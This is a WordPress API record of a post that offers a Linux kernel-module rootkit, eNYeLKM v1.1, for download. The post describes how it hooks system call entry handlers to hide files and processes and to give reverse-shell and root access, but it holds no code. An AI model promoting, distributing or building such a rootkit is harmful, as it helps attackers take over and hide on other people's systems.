{"id":39,"date":"2007-11-08T16:43:53","date_gmt":"2007-11-08T14:43:53","guid":{"rendered":"http:\/\/wordpress.enye-sec.org\/en\/?p=39"},"modified":"2012-06-15T16:44:19","modified_gmt":"2012-06-15T14:44:19","slug":"enyelkm-v1-1","status":"publish","type":"post","link":"https:\/\/www.enye-sec.org\/en\/programs\/enyelkm-v1-1\/","title":{"rendered":"eNYeLKM v1.1"},"content":{"rendered":"<p><span style=\"color: #333333; font-family: sans-serif; font-size: small;\">LKM rootkit for Linux x86 with the 2.6 kernel. It inserts salts inside system_call and sysenter_entry handlers, so it does not modify sys_call_table, or IDT content. It hide files, directories, and processes. Hides chunks inside of files, gives remote reverse_shell access, local root, etc.<\/span><\/p>\n<p><a href=\"http:\/\/www.enye-sec.org\/en\/programs\/enyelkm.en.v1.1.tar.gz\"><span style=\"color: #333333; font-family: sans-serif; font-size: small;\">Download LKM<\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>LKM rootkit for Linux x86 with the 2.6 kernel. It inserts salts inside system_call and sysenter_entry handlers, so it does not modify sys_call_table, or IDT content. It hide files, directories, and processes. Hides chunks inside of files, gives remote reverse_shell access, local root, etc. Download LKM<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[27,22,21,20,23,24,26,25],"class_list":["post-39","post","type-post","status-publish","format-standard","hentry","category-programs","tag-backdoor","tag-enye-lkm","tag-enyelkm","tag-lkm","tag-loadable-kernel-module","tag-raise","tag-rootkit","tag-trojan"],"_links":{"self":[{"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/posts\/39"}],"collection":[{"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/comments?post=39"}],"version-history":[{"count":2,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/posts\/39\/revisions"}],"predecessor-version":[{"id":41,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/posts\/39\/revisions\/41"}],"wp:attachment":[{"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/media?parent=39"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/categories?post=39"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.enye-sec.org\/en\/wp-json\/wp\/v2\/tags?post=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}